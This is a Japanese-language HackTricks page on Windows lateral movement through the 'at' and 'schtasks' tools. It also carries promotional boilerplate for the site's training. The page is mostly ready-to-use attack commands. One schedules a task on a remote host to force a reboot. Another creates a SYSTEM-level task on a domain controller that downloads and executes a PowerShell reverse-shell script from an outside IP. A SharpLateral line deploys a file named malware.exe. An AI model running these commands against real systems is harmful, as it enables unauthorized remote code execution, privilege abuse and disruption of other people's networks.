hacktricks/windows-hardening/lateral-movement/atexec.md
2024-04-06 18:36:04 +00:00

3.8 KiB
Raw Blame History

AtExec / SchtasksExec

ゼロからヒーローまでAWSハッキングを学ぶ htARTEHackTricks AWS Red Team Expert

HackTricks をサポートする他の方法:

動作原理

At は、ユーザー名/(パスワード/ハッシュ)を知っているホストでタスクをスケジュールすることを可能にします。そのため、他のホストでコマンドを実行して出力を取得するために使用できます。

At \\victim 11:00:00PM shutdown -r

schtaskを使用すると、まずタスクを作成してから呼び出す必要があります。

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>

{% endcode %}

{% code overflow="wrap" %}

schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

{% endcode %}

SharpLateral も使用できます:

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

{% endcode %}

シルバーチケットを使用したschtasksの詳細はこちら

htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ htARTEHackTricks AWS Red Team Expert

HackTricksをサポートする他の方法